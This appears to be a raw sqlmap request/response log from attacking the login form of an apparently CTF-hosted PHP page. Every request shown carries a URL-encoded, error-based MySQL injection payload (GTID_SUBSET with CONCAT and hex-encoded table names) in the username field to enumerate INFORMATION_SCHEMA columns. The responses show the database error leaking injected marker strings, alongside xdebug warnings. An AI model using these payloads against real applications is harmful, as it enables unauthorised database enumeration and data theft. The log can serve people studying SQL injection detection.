Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#26]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 315
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f46545f494e4445585f4341434845%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C8876%29--%20Yzak

HTTP response [#26] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#27]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 315
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f46545f494e4445585f5441424c45%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C5246%29--%20FbzM

HTTP response [#27] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#28]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 297
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f4c4f434b53%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C3889%29--%20dsrQ

HTTP response [#28] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363208</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#29]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 307
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f4c4f434b5f5741495453%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C5934%29--%20PWbO

HTTP response [#29] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#30]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 301
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f4d455452494353%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C1276%29--%20Kbjt

HTTP response [#30] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363208</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#31]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 309
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f5359535f434f4c554d4e53%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C9191%29--%20hOBw

HTTP response [#31] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#32]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 313
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f5359535f4441544146494c4553%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C7683%29--%20igti

HTTP response [#32] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#33]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 307
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f5359535f4649454c4453%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C3356%29--%20qCQA

HTTP response [#33] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#34]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 309
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f5359535f464f524549474e%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C7825%29--%20WAFK

HTTP response [#34] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#35]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 319
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f5359535f464f524549474e5f434f4c53%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C2117%29--%20QXrj

HTTP response [#35] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#36]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 309
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f5359535f494e4445584553%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C9649%29--%20iyVl

HTTP response [#36] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#37]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 307
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f5359535f5441424c4553%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C6683%29--%20xmOB

HTTP response [#37] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
